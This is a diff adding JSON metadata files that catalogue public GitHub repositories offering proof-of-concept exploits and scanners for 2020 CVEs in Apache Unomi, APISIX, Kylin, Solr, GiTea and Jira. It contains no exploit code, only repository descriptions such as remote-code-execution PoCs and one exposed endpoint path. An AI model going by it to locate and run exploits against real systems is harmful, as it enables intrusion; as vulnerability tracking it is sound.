"https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-13937", + "description": "Apache Kylin API Unauthorized Access", + "fork": false, + "created_at": "2021-01-22T06:53:34Z", + "updated_at": "2024-08-12T20:09:39Z", + "pushed_at": "2021-01-22T07:00:37Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-kylin", + "cve-2020-13937" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 553631586, + "name": "CVE-2020-13937", + "full_name": "kailing0220\/CVE-2020-13937", + "owner": { + "login": "kailing0220", + "id": 115863969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115863969?v=4", + "html_url": "https:\/\/github.com\/kailing0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kailing0220\/CVE-2020-13937", + "description": "Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息", + "fork": false, + "created_at": "2022-10-18T14:11:16Z", + "updated_at": "2022-10-19T02:35:27Z", + "pushed_at": "2022-10-18T14:31:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13942.json b/2020/CVE-2020-13942.json new file mode 100644 index 0000000000..8a168a2efb --- /dev/null +++ b/2020/CVE-2020-13942.json @@ -0,0 +1,219 @@ +[ + { + "id": 313899657, + "name": "CVE-2020-13942", + "full_name": "lp008\/CVE-2020-13942", + "owner": { + "login": "lp008", + "id": 11436275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11436275?v=4", + "html_url": "https:\/\/github.com\/lp008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lp008\/CVE-2020-13942", + "description": null, + "fork": false, + "created_at": "2020-11-18T10:29:47Z", + "updated_at": "2022-10-27T09:32:41Z", + "pushed_at": "2020-11-19T01:57:11Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 314181474, + "name": "CVE-2020-13942", + "full_name": "eugenebmx\/CVE-2020-13942", + "owner": { + "login": "eugenebmx", + "id": 35716373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35716373?v=4", + "html_url": "https:\/\/github.com\/eugenebmx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eugenebmx\/CVE-2020-13942", + "description": "CVE-2020-13942 unauthenticated RCE POC through MVEL and OGNL injection", + "fork": false, + "created_at": "2020-11-19T08:22:17Z", + "updated_at": "2024-08-12T20:07:46Z", + "pushed_at": "2020-12-21T12:48:48Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 29, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 314692880, + "name": "CVE-2020-13942-POC-", + "full_name": "shifa123\/CVE-2020-13942-POC-", + "owner": { + "login": "shifa123", + "id": 18241082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18241082?v=4", + "html_url": "https:\/\/github.com\/shifa123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shifa123\/CVE-2020-13942-POC-", + "description": "CVE-2020-13942 POC + Automation Script", + "fork": false, + "created_at": "2020-11-20T23:25:44Z", + "updated_at": "2024-08-12T20:07:49Z", + "pushed_at": "2020-11-23T10:48:34Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 314769989, + "name": "CVE-2020-13942", + "full_name": "blackmarketer\/CVE-2020-13942", + "owner": { + "login": "blackmarketer", + "id": 48115305, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48115305?v=4", + "html_url": "https:\/\/github.com\/blackmarketer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackmarketer\/CVE-2020-13942", + "description": null, + "fork": false, + "created_at": "2020-11-21T08:48:46Z", + "updated_at": "2024-08-12T20:07:50Z", + "pushed_at": "2022-10-12T16:32:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 323504939, + "name": "Unomi-CVE-2020-13942", + "full_name": "yaunsky\/Unomi-CVE-2020-13942", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/Unomi-CVE-2020-13942", + "description": "CVE-2020-13942 Apache Unomi 远程代码执行漏洞脚getshell", + "fork": false, + "created_at": "2020-12-22T02:57:50Z", + "updated_at": "2020-12-22T03:30:18Z", + "pushed_at": "2020-12-22T02:58:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 328714228, + "name": "apche_unomi_rce", + "full_name": "hoanx4\/apche_unomi_rce", + "owner": { + "login": "hoanx4", + "id": 54475792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54475792?v=4", + "html_url": "https:\/\/github.com\/hoanx4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hoanx4\/apche_unomi_rce", + "description": "Apache Unomi CVE-2020-13942: RCE Vulnerabilities", + "fork": false, + "created_at": "2021-01-11T15:50:27Z", + "updated_at": "2021-01-12T02:29:29Z", + "pushed_at": "2021-01-12T02:29:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 403360604, + "name": "CVE-2020-13942", + "full_name": "Prodrious\/CVE-2020-13942", + "owner": { + "login": "Prodrious", + "id": 88847741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88847741?v=4", + "html_url": "https:\/\/github.com\/Prodrious", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Prodrious\/CVE-2020-13942", + "description": null, + "fork": false, + "created_at": "2021-09-05T16:39:19Z", + "updated_at": "2021-09-05T16:39:31Z", + "pushed_at": "2021-09-05T16:39:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13945.json b/2020/CVE-2020-13945.json new file mode 100644 index 0000000000..19cc73bba8 --- /dev/null +++ b/2020/CVE-2020-13945.json @@ -0,0 +1,117 @@ +[ + { + "id": 490272524, + "name": "Apisix_Crack", + "full_name": "YutuSec\/Apisix_Crack", + "owner": { + "login": "YutuSec", + "id": 41934714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41934714?v=4", + "html_url": "https:\/\/github.com\/YutuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YutuSec\/Apisix_Crack", + "description": "Apisix系列漏洞:未授权漏洞(CVE-2021-45232)、默认秘钥(CVE-2020-13945)批量探测。", + "fork": false, + "created_at": "2022-05-09T12:26:11Z", + "updated_at": "2024-02-25T02:01:05Z", + "pushed_at": "2022-05-09T12:32:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830683919, + "name": "CVE-2020-13945-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2020-13945-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2020-13945-EXPLOIT", + "description": "A PoC exploit for CVE-2020-13945 - Apache APISIX Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-07-18T19:05:24Z", + "updated_at": "2024-11-08T09:44:33Z", + "pushed_at": "2024-07-21T16:21:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache-apisix", + "exploit", + "exploitation", + "hacking", + "rce", + "rce-exploit", + "rce-scanner", + "remote-code-execution", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839830576, + "name": "CVE-2020-13945-EXPLOIT", + "full_name": "x0root\/CVE-2020-13945-EXPLOIT", + "owner": { + "login": "x0root", + "id": 99962731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99962731?v=4", + "html_url": "https:\/\/github.com\/x0root", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x0root\/CVE-2020-13945-EXPLOIT", + "description": "PoC exploit for CVE-2020-13945 - Apache APISIX Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-08-08T12:10:51Z", + "updated_at": "2024-08-09T13:03:54Z", + "pushed_at": "2024-08-08T14:22:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache-apisix", + "exploit", + "exploitation", + "hacking", + "rce", + "rce-exploit", + "rce-scanner", + "remote-code-execution", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13957.json b/2020/CVE-2020-13957.json new file mode 100644 index 0000000000..8029c26eff --- /dev/null +++ b/2020/CVE-2020-13957.json @@ -0,0 +1,33 @@ +[ + { + "id": 365685785, + "name": "CVE-2020-13957", + "full_name": "s-index\/CVE-2020-13957", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2020-13957", + "description": "Apache Solr RCE CVE-2020-13957", + "fork": false, + "created_at": "2021-05-09T06:42:41Z", + "updated_at": "2024-05-07T08:25:02Z", + "pushed_at": "2021-06-06T08:51:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13958.json b/2020/CVE-2020-13958.json new file mode 100644 index 0000000000..e04ec76816 --- /dev/null +++ b/2020/CVE-2020-13958.json @@ -0,0 +1,33 @@ +[ + { + "id": 812618804, + "name": "CVE-2020-13958", + "full_name": "Grey-Junior\/CVE-2020-13958", + "owner": { + "login": "Grey-Junior", + "id": 40201653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40201653?v=4", + "html_url": "https:\/\/github.com\/Grey-Junior", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grey-Junior\/CVE-2020-13958", + "description": null, + "fork": false, + "created_at": "2024-06-09T12:07:53Z", + "updated_at": "2024-06-09T12:14:58Z", + "pushed_at": "2024-06-09T12:14:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13965.json b/2020/CVE-2020-13965.json new file mode 100644 index 0000000000..488ed0e9f7 --- /dev/null +++ b/2020/CVE-2020-13965.json @@ -0,0 +1,40 @@ +[ + { + "id": 786159976, + "name": "CVE-2020-13965", + "full_name": "mbadanoiu\/CVE-2020-13965", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2020-13965", + "description": "CVE-2020-13965: Cross-Site Scripting via Malicious XML Attachment in Roundcube Webmail", + "fork": false, + "created_at": "2024-04-13T15:49:04Z", + "updated_at": "2024-04-13T15:56:24Z", + "pushed_at": "2024-04-13T15:54:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cross-site-scripting", + "cve", + "cve-2020-13965", + "cves", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13973.json b/2020/CVE-2020-13973.json new file mode 100644 index 0000000000..2697da3576 --- /dev/null +++ b/2020/CVE-2020-13973.json @@ -0,0 +1,33 @@ +[ + { + "id": 808376374, + "name": "json-sanitizer", + "full_name": "epicosy\/json-sanitizer", + "owner": { + "login": "epicosy", + "id": 30272775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epicosy\/json-sanitizer", + "description": "json-sanitizer with CVE-2020-13973", + "fork": false, + "created_at": "2024-05-31T00:16:57Z", + "updated_at": "2024-05-31T00:18:09Z", + "pushed_at": "2024-05-31T00:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13995.json b/2020/CVE-2020-13995.json new file mode 100644 index 0000000000..01c341cdd3 --- /dev/null +++ b/2020/CVE-2020-13995.json @@ -0,0 +1,33 @@ +[ + { + "id": 647518523, + "name": "extract75-cve-2020-13995", + "full_name": "dbrumley\/extract75-cve-2020-13995", + "owner": { + "login": "dbrumley", + "id": 2975959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2975959?v=4", + "html_url": "https:\/\/github.com\/dbrumley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbrumley\/extract75-cve-2020-13995", + "description": null, + "fork": false, + "created_at": "2023-05-31T00:47:22Z", + "updated_at": "2023-06-01T18:49:08Z", + "pushed_at": "2023-06-02T02:50:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13996.json b/2020/CVE-2020-13996.json new file mode 100644 index 0000000000..3dfba44ab1 --- /dev/null +++ b/2020/CVE-2020-13996.json @@ -0,0 +1,33 @@ +[ + { + "id": 284481729, + "name": "CVE-2020-13996", + "full_name": "mkelepce\/CVE-2020-13996", + "owner": { + "login": "mkelepce", + "id": 10780392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10780392?v=4", + "html_url": "https:\/\/github.com\/mkelepce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mkelepce\/CVE-2020-13996", + "description": " Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection", + "fork": false, + "created_at": "2020-08-02T14:50:04Z", + "updated_at": "2020-08-02T14:52:24Z", + "pushed_at": "2020-08-02T14:52:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14064.json b/2020/CVE-2020-14064.json new file mode 100644 index 0000000000..96f110b13b --- /dev/null +++ b/2020/CVE-2020-14064.json @@ -0,0 +1,33 @@ +[ + { + "id": 272027432, + "name": "CVE-2020-14064", + "full_name": "networksecure\/CVE-2020-14064", + "owner": { + "login": "networksecure", + "id": 66864114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864114?v=4", + "html_url": "https:\/\/github.com\/networksecure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/networksecure\/CVE-2020-14064", + "description": null, + "fork": false, + "created_at": "2020-06-13T14:44:49Z", + "updated_at": "2024-07-24T08:37:02Z", + "pushed_at": "2024-07-24T08:36:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14065.json b/2020/CVE-2020-14065.json new file mode 100644 index 0000000000..1ce898983d --- /dev/null +++ b/2020/CVE-2020-14065.json @@ -0,0 +1,64 @@ +[ + { + "id": 271966778, + "name": "CVE-2020-14065", + "full_name": "networksecure\/CVE-2020-14065", + "owner": { + "login": "networksecure", + "id": 66864114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864114?v=4", + "html_url": "https:\/\/github.com\/networksecure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/networksecure\/CVE-2020-14065", + "description": null, + "fork": false, + "created_at": "2020-06-13T08:04:16Z", + "updated_at": "2024-07-24T08:36:24Z", + "pushed_at": "2024-07-24T09:01:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431119886, + "name": "CVE-2020-14065", + "full_name": "pinpinsec\/CVE-2020-14065", + "owner": { + "login": "pinpinsec", + "id": 94911442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94911442?v=4", + "html_url": "https:\/\/github.com\/pinpinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinpinsec\/CVE-2020-14065", + "description": "CVE-2020-14065", + "fork": false, + "created_at": "2021-11-23T13:53:45Z", + "updated_at": "2024-07-24T08:56:00Z", + "pushed_at": "2024-07-24T08:44:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14066.json b/2020/CVE-2020-14066.json new file mode 100644 index 0000000000..ff6a652dbc --- /dev/null +++ b/2020/CVE-2020-14066.json @@ -0,0 +1,64 @@ +[ + { + "id": 271974207, + "name": "CVE-2020-14066", + "full_name": "networksecure\/CVE-2020-14066", + "owner": { + "login": "networksecure", + "id": 66864114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66864114?v=4", + "html_url": "https:\/\/github.com\/networksecure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/networksecure\/CVE-2020-14066", + "description": null, + "fork": false, + "created_at": "2020-06-13T08:57:45Z", + "updated_at": "2024-07-24T08:37:30Z", + "pushed_at": "2024-07-24T08:37:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431123051, + "name": "CVE-2020-14066", + "full_name": "pinpinsec\/CVE-2020-14066", + "owner": { + "login": "pinpinsec", + "id": 94911442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94911442?v=4", + "html_url": "https:\/\/github.com\/pinpinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinpinsec\/CVE-2020-14066", + "description": "CVE-2020-14066", + "fork": false, + "created_at": "2021-11-23T14:02:54Z", + "updated_at": "2024-07-24T08:55:34Z", + "pushed_at": "2024-07-24T08:45:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14144.json b/2020/CVE-2020-14144.json new file mode 100644 index 0000000000..0002b52d8e --- /dev/null +++ b/2020/CVE-2020-14144.json @@ -0,0 +1,39 @@ +[ + { + "id": 467606604, + "name": "CVE-2020-14144-GiTea-git-hooks-rce", + "full_name": "p0dalirius\/CVE-2020-14144-GiTea-git-hooks-rce", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2020-14144-GiTea-git-hooks-rce", + "description": "A script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks", + "fork": false, + "created_at": "2022-03-08T17:14:27Z", + "updated_at": "2024-09-23T08:20:28Z", + "pushed_at": "2022-05-03T10:40:14Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-14144", + "git", + "gitea", + "hook", + "rce" + ], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14179.json b/2020/CVE-2020-14179.json new file mode 100644 index 0000000000..f67e0e0787 --- /dev/null +++ b/2020/CVE-2020-14179.json @@ -0,0 +1,100 @@ +[ + { + "id": 327922009, + "name": "CVE-2020-14179", + "full_name": "c0brabaghdad1\/CVE-2020-14179", + "owner": { + "login": "c0brabaghdad1", + "id": 48695612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48695612?v=4", + "html_url": "https:\/\/github.com\/c0brabaghdad1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0brabaghdad1\/CVE-2020-14179", + "description": "CVE-2020-14179 Scanner", + "fork": false, + "created_at": "2021-01-08T14:15:24Z", + "updated_at": "2024-08-12T20:09:14Z", + "pushed_at": "2021-01-18T01:49:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-14179", + "cve-scanning", + "information-disclosure", + "perl-script" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 726810727, + "name": "CVE-2020-14179", + "full_name": "mrnazu\/CVE-2020-14179", + "owner": { + "login": "mrnazu", + "id": 108541991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108541991?v=4", + "html_url": "https:\/\/github.com\/mrnazu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrnazu\/CVE-2020-14179", + "description": "Sensitive data exposure via \/secure\/QueryComponent!Default.jspa endpoint - CVE-2020-14179", + "fork": false, + "created_at": "2023-12-03T13:26:03Z", + "updated_at": "2024-10-30T22:02:06Z", + "pushed_at": "2023-12-03T14:45:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869722615, + "name": "CVE-2020-14179", + "full_name": "0x0060\/CVE-2020-14179", + "owner": { + "login": "0x0060", + "id": 182030439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182030439?v=4", + "html_url": "https:\/\/github.com\/0x0060", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0060\/CVE-2020-14179", + "description": "𓃌 - Jira 8.5.8 & 8.6.0 - 8.11.1 unauthorized view of SLA fields.", + "fork": false, + "created_at": "2024-10-08T19:19:40Z", + "updated_at": "2024-10-20T20:02:36Z", + "pushed_at": "2024-10-08T19:20:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14181.json b/2020/CVE-2020-14181.json new file mode 100644 index 0000000000..7312fdd1a3 --- /dev/null +++ b/2020/CVE-2020-14181.json @@ -0,0 +1,95 @@ +[ + { + "id": 295868190, + "name": "UserEnumJira", + "full_name": "und3sc0n0c1d0\/UserEnumJira", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/UserEnumJira", + "description": "Serie de scripts para enumerar nombres de usuarios de JIRA a partir de vulnerabilidades conocidas (CVE-2020-14181, CVE-2019-3403, CVE-2019-8449...)", + "fork": false, + "created_at": "2020-09-15T23:00:03Z", + "updated_at": "2022-12-29T16:40:10Z", + "pushed_at": "2021-05-03T00:39:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 307446561, + "name": "CVE-2020-14181", + "full_name": "Rival420\/CVE-2020-14181", + "owner": { + "login": "Rival420", + "id": 51548322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51548322?v=4", + "html_url": "https:\/\/github.com\/Rival420", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rival420\/CVE-2020-14181", + "description": "POC For CVE-2020-1481 - Jira Username Enumerator\/Validator", + "fork": false, + "created_at": "2020-10-26T17:07:28Z", + "updated_at": "2021-12-31T05:27:00Z", + "pushed_at": "2020-10-30T09:36:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 336200955, + "name": "CVE-2020-14181", + "full_name": "bk-rao\/CVE-2020-14181", + "owner": { + "login": "bk-rao", + "id": 55870144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55870144?v=4", + "html_url": "https:\/\/github.com\/bk-rao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bk-rao\/CVE-2020-14181", + "description": "Poc for CVE-2020-14181", + "fork": false, + "created_at": "2021-02-05T07:48:19Z", + "updated_at": "2021-03-09T12:09:03Z", + "pushed_at": "2021-02-05T07:50:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14195.json b/2020/CVE-2020-14195.json new file mode 100644 index 0000000000..3f46a2bc13 --- /dev/null +++ b/2020/CVE-2020-14195.json @@ -0,0 +1,36 @@ +[ + { + "id": 267076701, + "name": "CVE-2020-14195", + "full_name": "Al1ex\/CVE-2020-14195", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-14195", + "description": "This is a simple test for FasterXML jackson-databind", + "fork": false, + 